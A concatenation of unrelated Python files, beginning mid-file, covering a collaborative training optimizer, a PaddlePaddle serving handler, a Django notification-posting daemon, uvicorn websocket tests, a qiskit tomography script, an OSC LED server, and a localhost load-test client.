self.expected_drift_peers, num_peers * (1 + self.expected_drift_rate)) time_to_next_fetch = float(np.clip(a=estimated_time_to_next_step * num_peers / expected_max_peers, a_min=self.min_refresh_period, a_max=self.max_refresh_period)) logger.log(self.status_loglevel, f"Collaboration accumulated {total_samples_accumulated} samples from " f"{num_peers} peers; ETA {estimated_time_to_next_step:.2f} seconds " f"(refresh in {time_to_next_fetch:.2f}s.)") return CollaborationState( global_optimizer_step, total_samples_accumulated, target_batch_size=self.target_batch_size, num_peers=num_peers, num_clients=num_clients, eta_next_step=current_time + estimated_time_to_next_step, next_fetch_time=current_time + time_to_next_fetch) def zero_grad(self, *args, **kwargs): if self.reuse_grad_buffers: raise ValueError(f"When running {self.__class__.__name__} with reuse_grad_buffers=True, user should never " f"call zero_grad manually. 
Gradients will be refreshed internally.") return self.opt.zero_grad(*args, **kwargs) def update_scheduler(self): if self.scheduler: while self.scheduler._step_count < self.local_step: self.scheduler.step() def shutdown(self): logger.debug("Shutting down averager...") self.averager.shutdown() logger.debug("Sending goodbye to peers...") self.dht.store(self.training_progress_key, subkey=self._local_public_key, value=None, expiration_time=get_dht_time() + self.metadata_expiration) logger.debug(f"{self.__class__.__name__} is shut down.") def __del__(self): self.shutdown()
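# --- Usage sketch (not part of the original module) ---------------------------
# Minimal example of wrapping a plain torch optimizer. The DHT constructor
# arguments (initial_peers, start) are assumptions about the surrounding
# hivemind version; the model and data are toy placeholders.
if __name__ == "__main__":
    import hivemind  # assumed to expose DHT at the package root

    model = torch.nn.Linear(16, 1)                    # placeholder model
    base_opt = torch.optim.SGD(model.parameters(), lr=0.1)
    dht = hivemind.DHT(initial_peers=[], start=True)  # assumed DHT signature

    opt = CollaborativeOptimizer(
        base_opt, dht=dht, prefix="demo_run",
        target_batch_size=4096,     # global batch collectively accumulated by all peers
        batch_size_per_step=32,     # local samples per .step() call
        verbose=True)

    for _ in range(10):             # toy training loop
        x, y = torch.randn(32, 16), torch.randn(32, 1)
        loss = torch.nn.functional.mse_loss(model(x), y)
        loss.backward()
        opt.step()                  # may be a no-op until the collaboration is ready
        opt.zero_grad()             # allowed because reuse_grad_buffers defaults to False

    opt.shutdown()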
local_service_handler.py
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import os import logging import multiprocessing from .error_catch import ErrorCatch, CustomException, CustomExceptionCode #from paddle_serving_server import OpMaker, OpSeqMaker #from paddle_serving_server import Server as GpuServer #from paddle_serving_server import Server as CpuServer from . import util #from paddle_serving_app.local_predict import LocalPredictor _LOGGER = logging.getLogger(__name__) _workdir_name_gen = util.NameGenerator("workdir_") class LocalServiceHandler(object): """ LocalServiceHandler is the processor of the local service, contains three client types, brpc, grpc and local_predictor.If you use the brpc or grpc, serveing startup ability is provided.If you use local_predictor, local predict ability is provided by paddle_serving_app. """ def __init__(self, model_config, client_type='local_predictor', workdir="", thread_num=2, device_type=-1, devices="", fetch_names=None, mem_optim=True, ir_optim=False, available_port_generator=None, use_profile=False, precision="fp32", use_mkldnn=False, mkldnn_cache_capacity=0, mkldnn_op_list=None, mkldnn_bf16_op_list=None, min_subgraph_size=3, dynamic_shape_info={}, use_calib=False): """ Initialization of localservicehandler Args: model_config: model config path client_type: brpc, grpc and local_predictor[default] workdir: work directory thread_num: number of threads, concurrent quantity. device_type: support multiple devices. -1=Not set, determined by `devices`. 0=cpu, 1=gpu, 2=tensorRT, 3=arm cpu, 4=kunlun xpu devices: gpu id list[gpu], "" default[cpu] fetch_names: get fetch names out of LocalServiceHandler in local_predictor mode. fetch_names_ is compatible for Client(). mem_optim: use memory/graphics memory optimization, True default. ir_optim: use calculation chart optimization, False default. available_port_generator: generate available ports use_profile: use profiling, False default. precision: inference precesion, e.g. "fp32", "fp16", "int8" use_mkldnn: use mkldnn, default False. mkldnn_cache_capacity: cache capacity of mkldnn, 0 means no limit. mkldnn_op_list: OP list optimized by mkldnn, None default. mkldnn_bf16_op_list: OP list optimized by mkldnn bf16, None default. use_calib: set inference use_calib_mode param, False default. 
Returns: None """ if available_port_generator is None: available_port_generator = util.GetAvailablePortGenerator() self._model_config = model_config self._port_list = [] self._device_name = "cpu" self._use_gpu = False self._use_trt = False self._use_lite = False self._use_xpu = False self._use_ascend_cl = False self._use_mkldnn = False self._mkldnn_cache_capacity = 0 self._mkldnn_op_list = None self._mkldnn_bf16_op_list = None self.min_subgraph_size = 3 self.dynamic_shape_info = {} self._use_calib = False if device_type == -1: # device_type is not set, determined by `devices`, if devices == "": # CPU self._device_name = "cpu" devices = [-1] else: # GPU self._device_name = "gpu" self._use_gpu = True devices = [int(x) for x in devices.split(",")] elif device_type == 0: # CPU self._device_name = "cpu" devices = [-1] elif device_type == 1: # GPU self._device_name = "gpu" self._use_gpu = True devices = [int(x) for x in devices.split(",")] elif device_type == 2: # Nvidia Tensor RT self._device_name = "gpu" self._use_gpu = True devices = [int(x) for x in devices.split(",")] self._use_trt = True self.min_subgraph_size = min_subgraph_size self.dynamic_shape_info = dynamic_shape_info elif device_type == 3: # ARM CPU self._device_name = "arm" devices = [-1] self._use_lite = True elif device_type == 4: # Kunlun XPU self._device_name = "arm" devices = [int(x) for x in devices.split(",")] self._use_lite = True self._use_xpu = True elif device_type == 5: # Ascend 310 ARM CPU self._device_name = "arm" devices = [int(x) for x in devices.split(",")] self._use_lite = True self._use_ascend_cl = True elif device_type == 6: # Ascend 910 ARM CPU self._device_name = "arm" devices = [int(x) for x in devices.split(",")] self._use_ascend_cl = True else: _LOGGER.error( "LocalServiceHandler initialization fail. device_type={}" .format(device_type)) if client_type == "brpc" or client_type == "grpc": for _ in devices: self._port_list.append(available_port_generator.next()) _LOGGER.info("Create ports for devices:{}. Port:{}" .format(devices, self._port_list)) self._client_type = client_type self._workdir = workdir self._devices = devices self._thread_num = thread_num self._mem_optim = mem_optim self._ir_optim = ir_optim self._local_predictor_client = None self._rpc_service_list = [] self._server_pros = [] self._use_profile = use_profile self._fetch_names = fetch_names self._precision = precision self._use_mkldnn = use_mkldnn self._mkldnn_cache_capacity = mkldnn_cache_capacity self._mkldnn_op_list = mkldnn_op_list self._mkldnn_bf16_op_list = mkldnn_bf16_op_list self._use_calib = use_calib _LOGGER.info( "Models({}) will be launched by device {}. 
use_gpu:{}, " "use_trt:{}, use_lite:{}, use_xpu:{}, device_type:{}, devices:{}, " "mem_optim:{}, ir_optim:{}, use_profile:{}, thread_num:{}, " "client_type:{}, fetch_names:{}, precision:{}, use_calib:{}, " "use_mkldnn:{}, mkldnn_cache_capacity:{}, mkldnn_op_list:{}, " "mkldnn_bf16_op_list:{}, use_ascend_cl:{}, min_subgraph_size:{}," "is_set_dynamic_shape_info:{}".format( model_config, self._device_name, self._use_gpu, self._use_trt, self._use_lite, self._use_xpu, device_type, self._devices, self._mem_optim, self._ir_optim, self._use_profile, self._thread_num, self._client_type, self._fetch_names, self._precision, self._use_calib, self._use_mkldnn, self._mkldnn_cache_capacity, self._mkldnn_op_list, self._mkldnn_bf16_op_list, self._use_ascend_cl, self.min_subgraph_size, bool(len(self.dynamic_shape_info)))) def get_fetch_list(self): return self._fetch_names def get_port_list(self): return self._port_list def get_client(self, concurrency_idx): """ Function get_client is only used for local predictor case, creates one LocalPredictor object, and initializes the paddle predictor by function load_model_config.The concurrency_idx is used to select running devices. Args: concurrency_idx: process/thread index Returns: _local_predictor_client """ #checking the legality of concurrency_idx. device_num = len(self._devices) if device_num <= 0: _LOGGER.error("device_num must be not greater than 0. devices({})". format(self._devices)) raise ValueError("The number of self._devices error") if concurrency_idx < 0: _LOGGER.error("concurrency_idx({}) must be one positive number". format(concurrency_idx)) concurrency_idx = 0 elif concurrency_idx >= device_num: concurrency_idx = concurrency_idx % device_num _LOGGER.info("GET_CLIENT : concurrency_idx={}, device_num={}".format( concurrency_idx, device_num)) from paddle_serving_app.local_predict import LocalPredictor if self._local_predictor_client is None: self._local_predictor_client = LocalPredictor() # load model config and init predictor self._local_predictor_client.load_model_config( model_path=self._model_config, use_gpu=self._use_gpu, gpu_id=self._devices[concurrency_idx], use_profile=self._use_profile, thread_num=self._thread_num, mem_optim=self._mem_optim, ir_optim=self._ir_optim, use_trt=self._use_trt, use_lite=self._use_lite, use_xpu=self._use_xpu, precision=self._precision, use_mkldnn=self._use_mkldnn, mkldnn_cache_capacity=self._mkldnn_cache_capacity, mkldnn_op_list=self._mkldnn_op_list, mkldnn_bf16_op_list=self._mkldnn_bf16_op_list, use_ascend_cl=self._use_ascend_cl, min_subgraph_size=self.min_subgraph_size, dynamic_shape_info=self.dynamic_shape_info, use_calib=self._use_calib) return self._local_predictor_client def get_client_config(self): return os.path.join(self._model_config, "serving_server_conf.prototxt") def _prepare_one_server(self, workdir, port, gpuid, thread_num, mem_optim, ir_optim, precision): """ According to self._device_name, generating one Cpu/Gpu/Arm Server, and setting the model config amd startup params. 
Args: workdir: work directory port: network port gpuid: gpu id thread_num: thread num mem_optim: use memory/graphics memory optimization ir_optim: use calculation chart optimization precision: inference precison, e.g."fp32", "fp16", "int8" Returns: server: CpuServer/GpuServer """ if self._device_name == "cpu": from paddle_serving_server import OpMaker, OpSeqMaker, Server op_maker = OpMaker() read_op = op_maker.create('general_reader') general_infer_op = op_maker.create('general_infer') general_response_op = op_maker.create('general_response') op_seq_maker = OpSeqMaker() op_seq_maker.add_op(read_op) op_seq_maker.add_op(general_infer_op) op_seq_maker.add_op(general_response_op) server = Server() else: #gpu or arm from paddle_serving_server import OpMaker, OpSeqMaker, Server op_maker = OpMaker() read_op = op_maker.create('general_reader') general_infer_op = op_maker.create('general_infer') general_response_op = op_maker.create('general_response') op_seq_maker = OpSeqMaker() op_seq_maker.add_op(read_op) op_seq_maker.add_op(general_infer_op) op_seq_maker.add_op(general_response_op) server = Server() if gpuid >= 0: server.set_gpuid(gpuid) # TODO: support arm or arm + xpu later server.set_device(self._device_name) if self._use_xpu: server.set_xpu() if self._use_lite: server.set_lite() if self._use_ascend_cl: server.set_ascend_cl() server.set_op_sequence(op_seq_maker.get_op_sequence()) server.set_num_threads(thread_num) server.set_memory_optimize(mem_optim) server.set_ir_optimize(ir_optim) server.set_precision(precision) server.load_model_config(self._model_config) server.prepare_server( workdir=workdir, port=port, device=self._device_name) if self._fetch_names is None: self._fetch_names = server.get_fetch_list() return server def _start_one_server(self, service_idx): """ Start one server Args: service_idx: server index Returns: None """ self._rpc_service_list[service_idx].run_server() def prepare_server(self): """ Prepare all servers to be started, and append them into list. """ for i, device_id in enumerate(self._devices): if self._workdir != "": workdir = "{}_{}".format(self._workdir, i) else: workdir = _workdir_name_gen.next() self._rpc_service_list.append( self._prepare_one_server( workdir, self._port_list[i], device_id, thread_num=self._thread_num, mem_optim=self._mem_optim, ir_optim=self._ir_optim, precision=self._precision)) def start_server(self): """ Start multiple processes and start one server in each process """ for i, _ in enumerate(self._rpc_service_list): p = multiprocessing.Process( target=self._start_one_server, args=(i, )) p.daemon = True self._server_pros.append(p) for p in self._server_pros: p.start()
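# --- Usage sketch (not part of the original module) ---------------------------
# Driving the handler in its default local_predictor mode; the model directory
# is a hypothetical placeholder and must contain the serving config files.
if __name__ == "__main__":
    handler = LocalServiceHandler(
        model_config="./my_model_dir",   # hypothetical path
        client_type="local_predictor",   # the default; no server processes launched
        device_type=0,                   # 0 = CPU (see the device_type table above)
        devices="")

    predictor = handler.get_client(concurrency_idx=0)  # lazily creates a LocalPredictor
    print(handler.get_client_config())                 # client-side prototxt path

    # In brpc/grpc mode the handler launches real server processes instead:
    # handler = LocalServiceHandler("./my_model_dir", client_type="brpc", devices="")
    # handler.prepare_server()
    # handler.start_server()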
social_media_poster.py
#
# Daemon to post all queued up notifications and social media posts
#
from django.core.management.base import BaseCommand
from django.db import connection
from django.utils import autoreload

import sys
import threading
import select

from postgresqleu.util.messaging.sender import send_pending_messages, send_pending_posts
from postgresqleu.util.messaging import ProviderCache


class Command(BaseCommand):
    help = 'Daemon to post notifications and social media posts'

    def handle(self, *args, **options):
        # Automatically exit if our own code changes.
        # This is not based on a published API, so it is quite likely to break
        # and need updating in a future version of django.

        # Start our work in a background thread
        bthread = threading.Thread(target=self.inner_handle)
        bthread.daemon = True  # Thread.setDaemon() is deprecated since Python 3.10
        bthread.start()

        reloader = autoreload.get_reloader()
        while not reloader.should_stop:
            reloader.run(bthread)

        self.stderr.write("Underlying code changed, exiting for a restart")
        sys.exit(0)

    def inner_handle(self):
        with connection.cursor() as curs:
            curs.execute("LISTEN pgeu_notification")
            curs.execute("LISTEN pgeu_broadcast")
            curs.execute("SET application_name = 'pgeu messages/media poster'")

        while True:
            providers = ProviderCache()

            send_pending_messages(providers)
            send_pending_posts(providers)

            self.eat_notifications()

            # Wake up every 5 minutes to check if there is something to do, just in case
            select.select([connection.connection], [], [], 5 * 60)

    def eat_notifications(self):
        # Drain any queued NOTIFY events so select() blocks until the next one arrives
        connection.connection.poll()
        while connection.connection.notifies:
            connection.connection.notifies.pop()
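# --- Producer-side sketch (hypothetical helper, not part of this command) -----
# The daemon above sleeps in select() until a NOTIFY arrives on one of the two
# channels it LISTENs on; code that queues a message could wake it immediately:

def wake_poster_daemon(broadcast=False):
    # NOTIFY interrupts the daemon's select() so pending items are sent at once
    with connection.cursor() as curs:
        curs.execute("NOTIFY pgeu_broadcast" if broadcast else "NOTIFY pgeu_notification")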
test_websocket.py
from uvicorn.protocols.http.h11_impl import H11Protocol from uvicorn.protocols.websockets.websockets_impl import WebSocketProtocol from uvicorn.protocols.websockets.wsproto_impl import WSProtocol import asyncio import functools import time import threading import requests import pytest import websockets from contextlib import contextmanager class WebSocketResponse: def __init__(self, scope): self.scope = scope async def __call__(self, receive, send): self.send = send while True: message = await receive() message_type = message["type"].replace(".", "_") handler = getattr(self, message_type, None) if handler is not None: await handler(message) if message_type == 'websocket_disconnect': break def run_loop(loop): loop.run_forever() loop.close() @contextmanager def run_server(app, protocol_cls): tasks = set() asyncio.set_event_loop(None) loop = asyncio.new_event_loop() protocol = functools.partial(H11Protocol, app=app, loop=loop, tasks=tasks, ws_protocol_class=protocol_cls) create_server_task = loop.create_server(protocol, host="127.0.0.1") server = loop.run_until_complete(create_server_task) url = "ws://127.0.0.1:%d/" % server.sockets[0].getsockname()[1] try: # Run the event loop in a new thread. thread = threading.Thread(target=run_loop, args=[loop]) thread.start() # Return the contextmanager state. yield url finally: # Close the loop from our main thread. while tasks: time.sleep(0.01) loop.call_soon_threadsafe(loop.stop) thread.join() @pytest.mark.parametrize("protocol_cls", [WebSocketProtocol, WSProtocol]) def test_invalid_upgrade(protocol_cls): app = lambda scope: None with run_server(app, protocol_cls=protocol_cls) as url: url = url.replace("ws://", "http://") response = requests.get( url, headers={"upgrade": "websocket", "connection": "upgrade"}, timeout=5 ) assert response.status_code == 400 assert response.text in [ 'Missing Sec-WebSocket-Version header', # websockets 'Missing or empty Sec-WebSocket-Key header\n' # wsproto ] @pytest.mark.parametrize("protocol_cls", [WebSocketProtocol, WSProtocol]) def test_accept_connection(protocol_cls): class App(WebSocketResponse): async def websocket_connect(self, message): await self.send({"type": "websocket.accept"}) async def open_connection(url): async with websockets.connect(url) as websocket: return websocket.open with run_server(App, protocol_cls=protocol_cls) as url: loop = asyncio.new_event_loop() is_open = loop.run_until_complete(open_connection(url)) assert is_open loop.close() @pytest.mark.parametrize("protocol_cls", [WebSocketProtocol, WSProtocol]) def test_close_connection(protocol_cls): class App(WebSocketResponse): async def websocket_connect(self, message): await self.send({"type": "websocket.close"}) async def open_connection(url): try: await websockets.connect(url) except websockets.exceptions.InvalidHandshake: return False return True with run_server(App, protocol_cls=protocol_cls) as url: loop = asyncio.new_event_loop() is_open = loop.run_until_complete(open_connection(url)) assert not is_open loop.close() @pytest.mark.parametrize("protocol_cls", [WebSocketProtocol, WSProtocol]) def test_send_text_data_to_client(protocol_cls): class App(WebSocketResponse): async def websocket_connect(self, message): await self.send({"type": "websocket.accept"}) await self.send({"type": "websocket.send", "text": "123"}) async def get_data(url): async with websockets.connect(url) as websocket: return await websocket.recv() with run_server(App, protocol_cls=protocol_cls) as url: loop = asyncio.new_event_loop() data = 
        loop.run_until_complete(get_data(url))
        assert data == "123"
        loop.close()


@pytest.mark.parametrize("protocol_cls", [WebSocketProtocol, WSProtocol])
def test_send_binary_data_to_client(protocol_cls):
    class App(WebSocketResponse):
        async def websocket_connect(self, message):
            await self.send({"type": "websocket.accept"})
            await self.send({"type": "websocket.send", "bytes": b"123"})

    async def get_data(url):
        async with websockets.connect(url) as websocket:
            return await websocket.recv()

    with run_server(App, protocol_cls=protocol_cls) as url:
        loop = asyncio.new_event_loop()
        data = loop.run_until_complete(get_data(url))
        assert data == b"123"
        loop.close()


@pytest.mark.parametrize("protocol_cls", [WebSocketProtocol, WSProtocol])
def test_send_and_close_connection(protocol_cls):
    class App(WebSocketResponse):
        async def websocket_connect(self, message):
            await self.send({"type": "websocket.accept"})
            await self.send({"type": "websocket.send", "text": "123"})
            await self.send({"type": "websocket.close"})

    async def get_data(url):
        async with websockets.connect(url) as websocket:
            data = await websocket.recv()
            is_open = True
            try:
                await websocket.recv()
            except Exception:
                is_open = False
            return (data, is_open)

    with run_server(App, protocol_cls=protocol_cls) as url:
        loop = asyncio.new_event_loop()
        (data, is_open) = loop.run_until_complete(get_data(url))
        assert data == "123"
        assert not is_open
        loop.close()


@pytest.mark.parametrize("protocol_cls", [WebSocketProtocol, WSProtocol])
def test_send_text_data_to_server(protocol_cls):
    class App(WebSocketResponse):
        async def websocket_connect(self, message):
            await self.send({"type": "websocket.accept"})

        async def websocket_receive(self, message):
            _text = message.get("text")
            await self.send({"type": "websocket.send", "text": _text})

    async def send_text(url):
        async with websockets.connect(url) as websocket:
            await websocket.send("abc")
            return await websocket.recv()

    with run_server(App, protocol_cls=protocol_cls) as url:
        loop = asyncio.new_event_loop()
        data = loop.run_until_complete(send_text(url))
        assert data == "abc"
        loop.close()


@pytest.mark.parametrize("protocol_cls", [WebSocketProtocol, WSProtocol])
def test_send_binary_data_to_server(protocol_cls):
    class App(WebSocketResponse):
        async def websocket_connect(self, message):
            await self.send({"type": "websocket.accept"})

        async def websocket_receive(self, message):
            _bytes = message.get("bytes")
            await self.send({"type": "websocket.send", "bytes": _bytes})

    async def send_text(url):
        async with websockets.connect(url) as websocket:
            await websocket.send(b"abc")
            return await websocket.recv()

    with run_server(App, protocol_cls=protocol_cls) as url:
        loop = asyncio.new_event_loop()
        data = loop.run_until_complete(send_text(url))
        assert data == b"abc"
        loop.close()


@pytest.mark.parametrize("protocol_cls", [WebSocketProtocol, WSProtocol])
def test_send_after_protocol_close(protocol_cls):
    class App(WebSocketResponse):
        async def websocket_connect(self, message):
            await self.send({"type": "websocket.accept"})
            await self.send({"type": "websocket.send", "text": "123"})
            await self.send({"type": "websocket.close"})
            with pytest.raises(Exception):
                await self.send({"type": "websocket.send", "text": "123"})

    async def get_data(url):
        async with websockets.connect(url) as websocket:
            data = await websocket.recv()
            is_open = True
            try:
                await websocket.recv()
            except Exception:
                is_open = False
            return (data, is_open)

    with run_server(App, protocol_cls=protocol_cls) as url:
        loop = asyncio.new_event_loop()
        (data, is_open) = loop.run_until_complete(get_data(url))
        assert data == "123"
        assert not is_open
        loop.close()


@pytest.mark.parametrize("protocol_cls", [WebSocketProtocol, WSProtocol])
def test_missing_handshake(protocol_cls):
    class App:
        def __init__(self, scope):
            pass

        async def __call__(self, receive, send):
            pass

    async def connect(url):
        await websockets.connect(url)

    with run_server(App, protocol_cls=protocol_cls) as url:
        loop = asyncio.new_event_loop()
        with pytest.raises(websockets.exceptions.InvalidStatusCode) as exc:
            loop.run_until_complete(connect(url))
        assert exc.value.status_code == 500
        loop.close()


@pytest.mark.parametrize("protocol_cls", [WebSocketProtocol, WSProtocol])
def test_send_before_handshake(protocol_cls):
    class App:
        def __init__(self, scope):
            pass

        async def __call__(self, receive, send):
            await send({"type": "websocket.send", "text": "123"})

    async def connect(url):
        await websockets.connect(url)

    with run_server(App, protocol_cls=protocol_cls) as url:
        loop = asyncio.new_event_loop()
        with pytest.raises(websockets.exceptions.InvalidStatusCode) as exc:
            loop.run_until_complete(connect(url))
        assert exc.value.status_code == 500
        loop.close()


@pytest.mark.parametrize("protocol_cls", [WebSocketProtocol, WSProtocol])
def test_duplicate_handshake(protocol_cls):
    class App:
        def __init__(self, scope):
            pass

        async def __call__(self, receive, send):
            await send({"type": "websocket.accept"})
            await send({"type": "websocket.accept"})

    async def connect(url):
        async with websockets.connect(url) as websocket:
            data = await websocket.recv()

    with run_server(App, protocol_cls=protocol_cls) as url:
        loop = asyncio.new_event_loop()
        with pytest.raises(websockets.exceptions.ConnectionClosed) as exc:
            loop.run_until_complete(connect(url))
        assert exc.value.code == 1006
        loop.close()


@pytest.mark.parametrize("protocol_cls", [WebSocketProtocol, WSProtocol])
def test_asgi_return_value(protocol_cls):
    """
    The ASGI callable should return 'None'. If it doesn't, make sure
    that the connection is closed with an error condition.
    """

    class App:
        def __init__(self, scope):
            pass

        async def __call__(self, receive, send):
            await send({"type": "websocket.accept"})
            return 123

    async def connect(url):
        async with websockets.connect(url) as websocket:
            data = await websocket.recv()

    with run_server(App, protocol_cls=protocol_cls) as url:
        loop = asyncio.new_event_loop()
        with pytest.raises(websockets.exceptions.ConnectionClosed) as exc:
            loop.run_until_complete(connect(url))
        assert exc.value.code == 1006
        loop.close()


@pytest.mark.parametrize("protocol_cls", [WebSocketProtocol, WSProtocol])
def test_app_close(protocol_cls):
    class App:
        def __init__(self, scope):
            pass

        async def __call__(self, receive, send):
            while True:
                message = await receive()
                if message['type'] == 'websocket.connect':
                    await send({"type": "websocket.accept"})
                elif message['type'] == 'websocket.receive':
                    await send({"type": "websocket.close"})
                elif message['type'] == 'websocket.disconnect':
                    break

    async def websocket_session(url):
        async with websockets.connect(url) as websocket:
            await websocket.ping()
            await websocket.send('abc')
            await websocket.recv()

    with run_server(App, protocol_cls=protocol_cls) as url:
        loop = asyncio.new_event_loop()
        with pytest.raises(websockets.exceptions.ConnectionClosed) as exc:
            loop.run_until_complete(websocket_session(url))
        assert exc.value.code == 1000
        loop.close()


@pytest.mark.parametrize("protocol_cls", [WebSocketProtocol, WSProtocol])
def test_client_close(protocol_cls):
    class App:
        def __init__(self, scope):
            pass

        async def __call__(self, receive, send):
            while True:
                message = await receive()
                if message['type'] == 'websocket.connect':
                    await send({"type": "websocket.accept"})
                elif message['type'] == 'websocket.receive':
                    pass
                elif message['type'] == 'websocket.disconnect':
                    break

    async def websocket_session(url):
        async with websockets.connect(url) as websocket:
            await websocket.ping()
            await websocket.send('abc')

    with run_server(App, protocol_cls=protocol_cls) as url:
        loop = asyncio.new_event_loop()
        loop.run_until_complete(websocket_session(url))
        loop.close()


@pytest.mark.parametrize("protocol_cls", [WebSocketProtocol, WSProtocol])
@pytest.mark.parametrize("subprotocol", ["proto1", "proto2"])
def test_subprotocols(protocol_cls, subprotocol):
    class App(WebSocketResponse):
        async def websocket_connect(self, message):
            await self.send({"type": "websocket.accept", "subprotocol": subprotocol})

    async def get_subprotocol(url):
        async with websockets.connect(
            url, subprotocols=["proto1", "proto2"]
        ) as websocket:
            return websocket.subprotocol

    with run_server(App, protocol_cls=protocol_cls) as url:
        loop = asyncio.new_event_loop()
        accepted_subprotocol = loop.run_until_complete(get_subprotocol(url))
        assert accepted_subprotocol == subprotocol
        loop.close()
compare_Walltoall_adam_1layers.py
import qiskit
import numpy as np
import sys
sys.path.insert(1, '../')
# qtm.onequbit is imported here as well, so the reload below can resolve it
import qtm.base, qtm.constant, qtm.onequbit, qtm.nqubit, qtm.fubini_study, qtm.encoding
import importlib
import multiprocessing
importlib.reload(qtm.base)
importlib.reload(qtm.constant)
importlib.reload(qtm.onequbit)
importlib.reload(qtm.nqubit)
importlib.reload(qtm.fubini_study)


def run_walltoall(num_layers, num_qubits):
    n_walltoall = qtm.nqubit.calculate_n_walltoall(num_qubits)
    thetas = np.ones(num_layers * 3 * num_qubits + num_layers * n_walltoall)

    psi = 2 * np.random.rand(2**num_qubits) - 1
    psi = psi / np.linalg.norm(psi)
    qc = qiskit.QuantumCircuit(num_qubits, num_qubits)
    qc.initialize(psi, range(0, num_qubits))

    loss_values = []
    thetass = []
    for i in range(0, 400):
        if i % 20 == 0:
            print('W_alltoall: (' + str(num_layers) + ',' + str(num_qubits) + '): ' + str(i))
        grad_loss = qtm.base.grad_loss(
            qc,
            qtm.nqubit.create_Walltoall_layerd_state,
            thetas, num_layers=num_layers)
        if i == 0:
            m, v = list(np.zeros(thetas.shape[0])), list(
                np.zeros(thetas.shape[0]))
        thetas = qtm.base.adam(thetas, m, v, i, grad_loss)
        thetass.append(thetas.copy())
        qc_copy = qtm.nqubit.create_Walltoall_layerd_state(qc.copy(), thetas, num_layers)
        loss = qtm.base.loss_basis(qtm.base.measure(qc_copy, list(range(qc_copy.num_qubits))))
        loss_values.append(loss)

    traces = []
    fidelities = []
    for thetas in thetass:
        # Get |psi~> = U_target|000...>
        qc = qiskit.QuantumCircuit(num_qubits, num_qubits)
        qc = qtm.nqubit.create_Walltoall_layerd_state(
            qc, thetas, num_layers=num_layers).inverse()
        psi_hat = qiskit.quantum_info.Statevector.from_instruction(qc)
        # Calculate the metrics
        trace, fidelity = qtm.base.get_metrics(psi, psi_hat)
        traces.append(trace)
        fidelities.append(fidelity)

    print('Writing ... ' + str(num_layers) + ' layers,' + str(num_qubits) + ' qubits')

    np.savetxt("../../experiments/tomography/tomography_walltoall_" + str(num_layers) + "/" + str(num_qubits) + "/loss_values_adam.csv", loss_values, delimiter=",")
    np.savetxt("../../experiments/tomography/tomography_walltoall_" + str(num_layers) + "/" + str(num_qubits) + "/thetass_adam.csv", thetass, delimiter=",")
    np.savetxt("../../experiments/tomography/tomography_walltoall_" + str(num_layers) + "/" + str(num_qubits) + "/traces_adam.csv", traces, delimiter=",")
    np.savetxt("../../experiments/tomography/tomography_walltoall_" + str(num_layers) + "/" + str(num_qubits) + "/fidelities_adam.csv", fidelities, delimiter=",")


if __name__ == "__main__":
    # creating one process per (num_layers, num_qubits) pair
    num_layers = [1]
    num_qubits = [2, 3, 4, 5, 6]
    t_walltoalls = []
    for i in num_layers:
        for j in num_qubits:
            t_walltoalls.append(multiprocessing.Process(target=run_walltoall, args=(i, j)))

    for t_walltoall in t_walltoalls:
        t_walltoall.start()

    for t_walltoall in t_walltoalls:
        t_walltoall.join()

    print("Done!")
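
# --- Illustrative sketch (not part of the original script) ---
# `qtm.base.adam` is assumed here to implement the standard Adam update over the
# moment lists `m`/`v` and step index `i`; its internals are not visible in this
# file, so the hyperparameter names and defaults below are assumptions.
def adam_step(thetas, m, v, t, grad, lr=0.01, beta1=0.9, beta2=0.999, eps=1e-8):
    """One textbook Adam update; `t` is the 1-indexed step number."""
    for k in range(len(thetas)):
        m[k] = beta1 * m[k] + (1 - beta1) * grad[k]
        v[k] = beta2 * v[k] + (1 - beta2) * grad[k] ** 2
        m_hat = m[k] / (1 - beta1 ** t)  # bias-corrected first moment
        v_hat = v[k] / (1 - beta2 ** t)  # bias-corrected second moment
        thetas[k] = thetas[k] - lr * m_hat / (np.sqrt(v_hat) + eps)
    return thetas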
server.py
"""Small example OSC server This program listens to several addresses, and prints some information about received packets. """ import argparse import math import threading from pythonosc import dispatcher from pythonosc import osc_server import sys # insert at 1, 0 is the script path (or '' in REPL) # sys.path.insert(1, '/home/pi/otherwise_bpi/test_and_examples') # from LED_brightness import * from LED_Light.LED_Light import LED_Light dispatcher = dispatcher.Dispatcher() light = LED_Light() class Server: def __init__(self, ip = "192.168.1.16", port = 5005): self.ip = ip self.port = port self.server_thread = threading.Thread(target=listen_for_osc,kwargs={"ip":ip,"port":port}) self.server_thread.start() pass def close(self): light.close() self.server_thread.join() pass def print_brightness_handler(unused_addr, args, brightness): print("[{0}] ~ {1}".format(args[0], brightness)) light.set_brightness(brightness) def print_compute_handler(unused_addr, args, brightness): try: print("[{0}] ~ {1}".format(args[0], args[1](brightness))) except ValueError: pass def listen_for_osc(ip="192.168.1.16", port=5005): # global dispatcher dispatcher.map("/brightness", print_brightness_handler, "brightness") server = osc_server.ThreadingOSCUDPServer((ip, port), dispatcher) print("Serving on {}".format(server.server_address)) server.serve_forever()
client.py
import time
import requests
import random
import threading
from multiprocessing import Pool

s = requests.session()


def post_result(mid):
    start = time.time()
    data = {
        "total_pay": 0,
        "level": 2,
        "mid": mid,
        "machine": "FuFuRiches",
        "avatar_url": "",
        "vip_level": 0,
        "balance": 101660,
        "bet": 500
    }
    r = s.post('http://127.0.0.1:8081/test', json=data, timeout=10).json()
    timer = time.time() - start
    print('resp_time:{}'.format(timer))


def multi_process():
    p = Pool(200)
    i = 149500
    for _ in range(1):
        p.map(post_result, [i for i in range(i, i + 200)])


def multi_thread():
    ths = []
    for i in range(200):
        t = threading.Thread(target=post_result, args=(i,))
        ths.append(t)
    print('begin start')
    for t in ths:
        t.start()
    print('begin join...')
    for t in ths:
        t.join()


if __name__ == '__main__':
    start = time.time()
    multi_process()
    # multi_thread()
    print(time.time() - start)

# 200 + gevent + gunicorn + flask
"""
resp_time:1.4399609565734863
resp_time:1.3442130088806152
resp_time:1.2940950393676758
resp_time:1.534102201461792
resp_time:1.3304438591003418
"""
# 20 gunicorn + gevent + flask
"""
resp_time:0.10559415817260742
resp_time:0.11883115768432617
resp_time:0.10376501083374023
resp_time:0.11776995658874512
"""
# 20 gunicorn + flask
